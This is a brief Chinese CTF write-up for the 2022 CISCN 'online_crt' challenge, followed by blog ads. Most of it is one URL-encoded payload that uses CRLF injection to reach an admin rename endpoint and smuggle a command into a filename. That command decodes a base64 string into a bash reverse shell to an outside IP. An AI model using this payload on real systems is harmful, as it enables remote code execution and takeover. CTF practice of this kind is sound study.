2022 CISCN初赛
online_crt
通过以下点进行CRLF触发/admin/rename处修改crt文件名
经过本地多次测试获得payload
uri=/admin%252Frename%3Foldname%3D4c9a3b84-f582-42e2-b1db-21d44c982eb6.crt%26newname%3Dggbond.crt%2522%257Cecho%2520YmFzaCAtaSA%252BJiAvZGV2L3RjcC84Mi4xNTcuMTc0LjIyNi85OTk5IDA%252BJjE%253D%257Cbase64%2520-d%257Cbash%2520-i%2522%20HTTP%2F1.1%0D%0AHost%3A%20admin%0D%0A%0D%0A%0D%0A%0D%0A
请求/createlink触发反弹shell
基于挑战码的双向认证3
在以下俩处分别加入以下代码对应如图:
通过对比login_server.c下面两处分别在login_user.c处添加即可!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· Manus爆火,是硬核还是营销?
· 终于写完轮子一部分:tcp代理 了,记录一下
· 别再用vector<bool>了!Google高级工程师:这可能是STL最大的设计失误
· 单元测试从入门到精通